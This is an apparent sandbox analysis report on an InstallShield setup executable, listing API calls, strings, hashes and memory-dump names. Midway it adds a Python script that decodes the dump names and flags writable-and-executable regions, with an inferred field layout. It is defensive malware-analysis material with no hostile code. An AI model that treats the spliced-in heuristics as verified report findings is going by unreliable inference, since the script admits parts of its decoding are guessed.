                                                                                                                                                                          • Instruction Fuzzy Hash: 225106B19003029FDF649F21D982AA677B4FF14315F2045AFE889AA193F338DA91CF55
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00423AD9
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00423AEC
                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00423B2D
                                                                                                                                                                          • _memmove.LIBCMT ref: 00423B93
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,00002800,?,00000000,?,?,00000000,00002800), ref: 00423BC2
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00423BCC
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00423C08
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,00002800), ref: 00423CA7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$File$CloseCreateException@8HandleThrowWrite_memmove
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2788177597-0
                                                                                                                                                                          • Opcode ID: f8bb48826f1b66e1690944c740aedc980584b964f21647cef04e7fdd88437da7
                                                                                                                                                                          • Instruction ID: c45d509c2fe2222fe7f2e22f3f5bd745226bb6fffc069478bfe817ba126106b2
                                                                                                                                                                          • Opcode Fuzzy Hash: f8bb48826f1b66e1690944c740aedc980584b964f21647cef04e7fdd88437da7
                                                                                                                                                                          • Instruction Fuzzy Hash: 24511B31A01364ABEB25DF25DC95BAEBBBCEB04311F4001AFE509E2181D73C9F408B18
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00432286
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000060,00000424), ref: 004322C5
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002), ref: 004322DB
                                                                                                                                                                          • FindResourceW.KERNEL32(00000000,?,?), ref: 00432306
                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 0043231E
                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,00000000), ref: 00432330
                                                                                                                                                                            • Part of subcall function 00431868: GetLastError.KERNEL32 ref: 00431868
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 004323D4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LibraryLoadResource$ErrorFindFreeH_prolog3_catch_LastSizeof
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1818814483-0
                                                                                                                                                                          • Opcode ID: 4b6d774511196b4f7bb8eb6fda51fb98f3fb3532b3367d0aa56b10fdfbdb3127
                                                                                                                                                                          • Instruction ID: 18e2b466da65482b05baaaf38ba89b121a573677756ea3cea398d78977fe4298
                                                                                                                                                                          • Opcode Fuzzy Hash: 4b6d774511196b4f7bb8eb6fda51fb98f3fb3532b3367d0aa56b10fdfbdb3127
                                                                                                                                                                          • Instruction Fuzzy Hash: 6F4180B09006299BCB219F258D44BDE7AB5EF48310F5081EEF909A3251DB784EC1DF6D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 0043D05F
                                                                                                                                                                            • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
                                                                                                                                                                            • Part of subcall function 00455724: __EH_prolog3_GS.LIBCMT ref: 0045572E
                                                                                                                                                                          • LoadImageW.USER32 ref: 0043D0B5
                                                                                                                                                                          • GetDC.USER32(00000000), ref: 0043D0E6
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0043D0F7
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0043D0FE
                                                                                                                                                                          • ReleaseDC.USER32 ref: 0043D106
                                                                                                                                                                          • CreateDialogParamW.USER32 ref: 0043D132
                                                                                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 0043D13C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CapsDeviceH_prolog3$CreateDialogForegroundH_prolog3_ImageLoadParamReleaseWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2034763720-0
                                                                                                                                                                          • Opcode ID: 3fe15749e4a0d24f6a3cb93ebb78194c3c7ddcaad0d005aee2e099d47ea2de66
                                                                                                                                                                          • Instruction ID: 62da21f4f13d0b11fa62a9c925dc8cac3d14fe0fd66976ceafcb865f57749cd2
                                                                                                                                                                          • Opcode Fuzzy Hash: 3fe15749e4a0d24f6a3cb93ebb78194c3c7ddcaad0d005aee2e099d47ea2de66
                                                                                                                                                                          • Instruction Fuzzy Hash: 5231C271900208AFEB10AF65DC85E9E3BB9FB08354F51853EF859AB291D778DD04CB58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_wsprintf
                                                                                                                                                                          • String ID: 1033$Startup$UseDotNetUI
                                                                                                                                                                          • API String ID: 1814582032-2843573423
                                                                                                                                                                          • Opcode ID: bb39905fb8f425178ded4e5acd435821e6bdbc304818d30a8fffb5f9cd8690c1
                                                                                                                                                                          • Instruction ID: 24b7e6cdc75fdaa1419571a9f18967236587b93ff6fb5cb8e25468631c6796ce
                                                                                                                                                                          • Opcode Fuzzy Hash: bb39905fb8f425178ded4e5acd435821e6bdbc304818d30a8fffb5f9cd8690c1
                                                                                                                                                                          • Instruction Fuzzy Hash: CFC18B70A012289FDB24DF68CD81BDDB7B4AF05304F5041EEE149AB292DB789E84CF59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0043EDF4
  • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
  • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
  • Part of subcall function 00436124: __EH_prolog3_GS.LIBCMT ref: 0043612B
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorH_prolog3_Last
• String ID: BuildNo$MajorVer$MinorVer$MinorVerMax$PlatformId
• API String ID: 1018228973-1900021638
• Opcode ID: c14e964518db706a438fb0c7574dab413fd53a19cd3dc984a3e7a88d6b6f7216
• Instruction ID: 2d6b04700e7f207dd771083e90e4ba25fe7fd3e382f249cb3e82a8425f8ac04f
• Opcode Fuzzy Hash: c14e964518db706a438fb0c7574dab413fd53a19cd3dc984a3e7a88d6b6f7216
• Instruction Fuzzy Hash: 73B13A71D8021AEADB65DF54CC91BEDB7B4AB08318F1041FAA519B61C2EBB85F84CF44
Uniqueness
Uniqueness Score: -1.00%
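The dump names in each Memory Dump Source list carry the region's start address and its page protection, which is what tells an analyst whether code pages are being written at run time. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it decodes those names with the winnt.h PAGE_* constants and flags regions that are both writable and executable. The field layout assumed here (process index, stage, dump id, start address, protection, type) is inferred from the names on this page, not documented; the PAGE_* values are authoritative, and the last field is passed through undecoded.

```python
"""Decode Joe Sandbox memory-dump file names and flag W+X regions.

Assumed name layout (inferred from the report, not documented):
    <proc>.<stage>.<dumpid>.<start>.<protect>.<type>.sdmp
"""
import re
from dataclasses import dataclass
from typing import Iterable, List

# Page-protection constants from winnt.h (authoritative values).
PAGE_NOACCESS = 0x01
PAGE_READONLY = 0x02
PAGE_READWRITE = 0x04
PAGE_WRITECOPY = 0x08
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80

PROTECTION_NAMES = {
    PAGE_NOACCESS: "PAGE_NOACCESS",
    PAGE_READONLY: "PAGE_READONLY",
    PAGE_READWRITE: "PAGE_READWRITE",
    PAGE_WRITECOPY: "PAGE_WRITECOPY",
    PAGE_EXECUTE: "PAGE_EXECUTE",
    PAGE_EXECUTE_READ: "PAGE_EXECUTE_READ",
    PAGE_EXECUTE_READWRITE: "PAGE_EXECUTE_READWRITE",
    PAGE_EXECUTE_WRITECOPY: "PAGE_EXECUTE_WRITECOPY",
}
EXEC_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
WRITE_MASK = PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY

# Field widths match the names on the page: 8 hex, 8 hex, decimal, 16 hex, 8 hex, 8 hex.
_DUMP_NAME = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)"
    r"\.(?P<start>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<kind>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    name: str
    process_index: int
    stage: int
    dump_id: int
    start: int
    protection: int
    kind: int  # assumed meaning unknown; carried through undecoded

    @property
    def protection_name(self) -> str:
        # Mask off modifier bits (PAGE_GUARD 0x100, PAGE_NOCACHE 0x200, ...) before lookup.
        return PROTECTION_NAMES.get(self.protection & 0xFF, f"0x{self.protection:x}")

    @property
    def executable(self) -> bool:
        return bool(self.protection & EXEC_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protection & WRITE_MASK)

    def rva(self, image_base: int) -> int:
        """Offset of the region from the PE image base (the report's 'Offset' value)."""
        return self.start - image_base


def parse_dump_name(name: str) -> DumpRegion:
    m = _DUMP_NAME.match(name)
    if m is None:
        raise ValueError(f"not a recognised dump name: {name!r}")
    return DumpRegion(
        name=name,
        process_index=int(m["proc"], 16),
        stage=int(m["stage"], 16),
        dump_id=int(m["dump_id"], 10),
        start=int(m["start"], 16),
        protection=int(m["prot"], 16),
        kind=int(m["kind"], 16),
    )


def find_wx_regions(names: Iterable[str]) -> List[DumpRegion]:
    """Regions that are writable and executable at once, lowest address first."""
    regions = [parse_dump_name(n) for n in names]
    return sorted((r for r in regions if r.writable and r.executable), key=lambda r: r.start)


# Sample input: the ten dump names the report lists for one function (copied from
# the page); the decoding applied to them is this example's, not the report's.
SAMPLE_DUMPS = [
    "00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp",
    "00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp",
    "00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp",
    "00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp",
    "00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp",
    "00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp",
    "00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp",
    "00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp",
    "00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp",
    "00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp",
]
IMAGE_BASE = 0x400000  # the report's "Offset: 00400000"

if __name__ == "__main__":
    for r in map(parse_dump_name, SAMPLE_DUMPS):
        flag = "  <-- writable and executable" if r.writable and r.executable else ""
        print(f"{r.start:#010x} rva={r.rva(IMAGE_BASE):#x} {r.protection_name}{flag}")
```

Run against the ten names above it reports 0x401000 and 0x448000 as PAGE_EXECUTE_WRITECOPY and 0x445000 as PAGE_EXECUTE_READWRITE. Image code pages are mapped copy-on-write, and a page that has moved from PAGE_EXECUTE_WRITECOPY to PAGE_EXECUTE_READWRITE has been written to after load; a run of such pages inside the code section is the pattern to look for when a sample modifies or unpacks code in place.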

APIs
• __EH_prolog3_GS.LIBCMT ref: 00434792
  • Part of subcall function 00437452: __EH_prolog3_GS.LIBCMT ref: 0043745C
  • Part of subcall function 0043780F: __EH_prolog3_GS.LIBCMT ref: 00437819
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog3_
• String ID: %s=%s$Dumping setup.ini...$Password$Section: %s$session.cpp
• API String ID: 2427045233-142721329
• Opcode ID: eef0f4ee384f7d01eeb973d34b625b1c03cec776b05ca7c6658c9015e3f7c0ec
• Instruction ID: 6e147920d667c45b1193f9cfa4b8c11fed8708b64dc5f7c17d19756e2255ffbe
• Opcode Fuzzy Hash: eef0f4ee384f7d01eeb973d34b625b1c03cec776b05ca7c6658c9015e3f7c0ec
• Instruction Fuzzy Hash: AE816D70900258DADB24EB61CD95BDDB7B4AF44308F5041AFE00AB71D1EB786F89CB59
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00417583
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 00416CC5: __EH_prolog3_GS.LIBCMT ref: 00416CCC
  • Part of subcall function 0041751D: __EH_prolog3.LIBCMT ref: 00417524
  • Part of subcall function 0040F686: __EH_prolog3_GS.LIBCMT ref: 0040F690
  • Part of subcall function 004100B6: __EH_prolog3_GS.LIBCMT ref: 004100BD
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
  • Part of subcall function 0045A7BA: __EH_prolog3.LIBCMT ref: 0045A7C1
  • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
  • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
  • Part of subcall function 0045BCCE: __EH_prolog3_GS.LIBCMT ref: 0045BCD8
  • Part of subcall function 0040C5CB: __EH_prolog3_GS.LIBCMT ref: 0040C5D2
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog3_$ErrorH_prolog3Last$FreeString
• String ID: %ld$.ini$0x%04x$HsG$HsG
• API String ID: 4231056545-161451753
• Opcode ID: df85160968ec2afca7cc87f43055df440d703c7a15bdb1ab697befc023f127cf
• Instruction ID: 0066c2f01c97bf5d5e4a89121c3dca338c79dbd74e81228124df2c0031a3ae6a
• Opcode Fuzzy Hash: df85160968ec2afca7cc87f43055df440d703c7a15bdb1ab697befc023f127cf
• Instruction Fuzzy Hash: CA718F71C0525CEADB10EBA4CC46BEDBB78AF15304F5440DEE405B7182EBB85B48DBA6
Uniqueness
Uniqueness Score: -1.00%


                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0043F1E6
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                            • Part of subcall function 00436124: __EH_prolog3_GS.LIBCMT ref: 0043612B
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 00411F19: __EH_prolog3_GS.LIBCMT ref: 00411F20
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3_$FreeString
                                                                                                                                                                          • String ID: 1.20.1827.0$CSDVersion$MajorVer$ServicePack$System\CurrentControlSet\Control\Windows
                                                                                                                                                                          • API String ID: 1274762985-3305444093
                                                                                                                                                                          • Opcode ID: a7f68345f08df2eed4eb825750f56187fce42b999a73d211762b2cd56f98bffc
                                                                                                                                                                          • Instruction ID: 08730fe2c2659566450736e7e543f4e1c458b56fe1b396d5e49b4a5f01ea2595
                                                                                                                                                                          • Opcode Fuzzy Hash: a7f68345f08df2eed4eb825750f56187fce42b999a73d211762b2cd56f98bffc
                                                                                                                                                                          • Instruction Fuzzy Hash: D9517D31D00218EADB24DBA1CD92BEDB778BF04314F60416EE501B71D2EBB85A0ACB59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00421869
                                                                                                                                                                            • Part of subcall function 004108DA: __EH_prolog3_GS.LIBCMT ref: 004108E1
                                                                                                                                                                            • Part of subcall function 00416CC5: __EH_prolog3_GS.LIBCMT ref: 00416CCC
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog3_$ErrorFreeLastString
• String ID: TRANSFORMS="$.mst$.mst"$TRANSFORMS=$TRANSFORMS="
• API String ID: 2278686355-3238450747
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_catch_GS.LIBCMT ref: 00417D49
• _memset.LIBCMT ref: 00417D6C
• _memset.LIBCMT ref: 00417D7A
  • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
  • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
• _wcscpy.LIBCMT ref: 00417DC5
• _memset.LIBCMT ref: 00417E05
Strings
Similarity
• API ID: _memset$ErrorLast$H_prolog3_catch__wcscpy
• String ID: 0
• API String ID: 2195959318-4108050209
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 0042D6F3
  • Part of subcall function 00405400: SysFreeString.OLEAUT32(?), ref: 0040540E
• GetErrorInfo.OLEAUT32(00000000,00000000,00000014,0042CE29,00000008,0042D281,8007000E,00000124,0042E821,00000001,00000080,0043754C,?,?,00000000,Startup), ref: 0042D727
• CLSIDFromProgID.OLE32(00000001,?,?,0000044F,?,00000978,004347AB,000000EC,0041CDEC,0043CC68), ref: 0042D7CD
• FormatMessageW.KERNEL32(00001300,00000000,00000005,00000000,00000008,00000000,00000000,?,0000044F,?,00000978,004347AB,000000EC,0041CDEC,0043CC68), ref: 0042D7F3
• LocalFree.KERNEL32(00000000,?,0000044F,?,00000978,004347AB,000000EC,0041CDEC,0043CC68), ref: 0042D815
  • Part of subcall function 0041159A: __EH_prolog3.LIBCMT ref: 004115A1
  • Part of subcall function 004035C0: SysStringLen.OLEAUT32(?), ref: 004035CE
  • Part of subcall function 004035C0: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 004035E8
Strings
Similarity
• API ID: String$FreeH_prolog3$AllocErrorFormatFromInfoLocalMessageProg
• String ID: Unknown error
• API String ID: 2182933432-83687255
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0042E4E1
  • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
  • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
  • Part of subcall function 00436124: __EH_prolog3_GS.LIBCMT ref: 0043612B
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
Strings
Similarity
• API ID: ErrorLast$FreeH_prolog3_String
• String ID: %s%d$HsG$UpgardeTable$count$key
